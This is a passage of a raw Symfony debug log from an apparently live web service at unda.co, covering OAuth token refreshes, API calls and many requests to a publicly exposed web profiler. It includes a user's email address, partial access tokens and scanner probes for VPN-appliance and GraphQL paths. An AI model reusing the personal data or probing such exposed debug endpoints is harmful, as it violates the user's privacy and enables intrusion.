  847. [2025-12-16 14:57:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
  848. [2025-12-16 15:02:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  849. [2025-12-16 15:05:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=157.245.150.92&limit=10","method":"GET"} []
  850. [2025-12-16 15:05:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=157.245.150.92&limit=10","method":"GET"} []
  851. [2025-12-16 15:09:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c42df0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c42df0?panel=time","method":"GET"} []
  852. [2025-12-16 15:09:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  853. [2025-12-16 15:09:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2261d2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2261d2","method":"GET"} []
  854. [2025-12-16 15:09:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  855. [2025-12-16 15:20:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
  856. [2025-12-16 15:22:51] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  857. [2025-12-16 15:22:51] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  858. [2025-12-16 15:22:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["8bc1b06d58adc8faddd36925c1 [...]"] []
  859. [2025-12-16 15:22:51] doctrine.DEBUG: "START TRANSACTION" [] []
  860. [2025-12-16 15:22:51] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"3bb871acc2d065474990463a1c [...]","3":"2025-12-16 15:52:51","4":"","5":410,"6":"[]"} []
  861. [2025-12-16 15:22:51] doctrine.DEBUG: "COMMIT" [] []
  862. [2025-12-16 15:22:51] doctrine.DEBUG: "START TRANSACTION" [] []
  863. [2025-12-16 15:22:51] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"381c689347234863a298410dab [...]","3":"2026-02-14 15:22:51","4":"","5":410,"6":"[]"} []
  864. [2025-12-16 15:22:51] doctrine.DEBUG: "COMMIT" [] []
  865. [2025-12-16 15:22:51] doctrine.DEBUG: "START TRANSACTION" [] []
  866. [2025-12-16 15:22:51] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"8bc1b06d58adc8faddd36925c1 [...]"] []
  867. [2025-12-16 15:22:51] doctrine.DEBUG: "COMMIT" [] []
  868. [2025-12-16 15:22:52] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/10/0?order=desc","method":"GET"} []
  869. [2025-12-16 15:22:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  870. [2025-12-16 15:22:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  871. [2025-12-16 15:22:52] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  872. [2025-12-16 15:22:52] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  873. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["3bb871acc2d065474990463a1c [...]"] []
  874. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
  875. [2025-12-16 15:22:52] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"shiba.74@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  876. [2025-12-16 15:22:52] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  877. [2025-12-16 15:22:52] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  878. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  879. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [410,270,1] []
  880. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  881. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  882. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [270,1] []
  883. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
  884. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  885. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
  886. [2025-12-16 15:22:52] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  887. [2025-12-16 15:22:52] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  888. [2025-12-16 15:22:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  889. [2025-12-16 15:22:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  890. [2025-12-16 15:22:52] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  891. [2025-12-16 15:22:52] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  892. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["3bb871acc2d065474990463a1c [...]"] []
  893. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
  894. [2025-12-16 15:22:52] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"shiba.74@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  895. [2025-12-16 15:22:52] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  896. [2025-12-16 15:22:52] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  897. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["f2f23f0d-85c6-44c9-b07a-59 [...]"] []
  898. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [410,1] []
  899. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [410,1] []
  900. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  901. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  902. [2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [410,270] []
  903. [2025-12-16 15:22:52] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  904. [2025-12-16 15:32:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  905. [2025-12-16 15:32:31] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"d72ea8","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/d72ea8","method":"GET"} []
  906. [2025-12-16 15:38:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  907. [2025-12-16 15:39:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=twig","method":"GET"} []
  908. [2025-12-16 15:39:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  909. [2025-12-16 15:39:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  910. [2025-12-16 15:40:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=cache","method":"GET"} []
  911. [2025-12-16 15:40:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  912. [2025-12-16 15:42:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
  913. [2025-12-16 15:42:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  914. [2025-12-16 15:45:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c5960","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c5960?panel=time","method":"GET"} []
  915. [2025-12-16 15:45:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  916. [2025-12-16 15:47:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
  917. [2025-12-16 15:47:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  918. [2025-12-16 15:54:19] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  919. [2025-12-16 15:55:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  920. [2025-12-16 15:55:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  921. [2025-12-16 16:00:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=109.199.118.129&limit=10","method":"GET"} []
  922. [2025-12-16 16:00:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=109.199.118.129&limit=10","method":"GET"} []
  923. [2025-12-16 16:01:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  924. [2025-12-16 16:01:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8599e8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8599e8?panel=time","method":"GET"} []
  925. [2025-12-16 16:01:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  926. [2025-12-16 16:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=dump","method":"GET"} []
  927. [2025-12-16 16:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  928. [2025-12-16 16:20:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"HEAD"} []
  929. [2025-12-16 16:20:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"35e76f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/35e76f?panel=exception","method":"GET"} []
  930. [2025-12-16 16:20:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  931. [2025-12-16 16:29:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80","method":"GET"} []
  932. [2025-12-16 16:29:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  933. [2025-12-16 16:43:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=logger","method":"GET"} []
  934. [2025-12-16 16:43:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  935. [2025-12-16 17:00:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=time","method":"GET"} []
  936. [2025-12-16 17:00:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  937. [2025-12-16 17:01:06] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  938. [2025-12-16 17:01:06] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  939. [2025-12-16 17:01:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  940. [2025-12-16 17:01:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  941. [2025-12-16 17:01:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
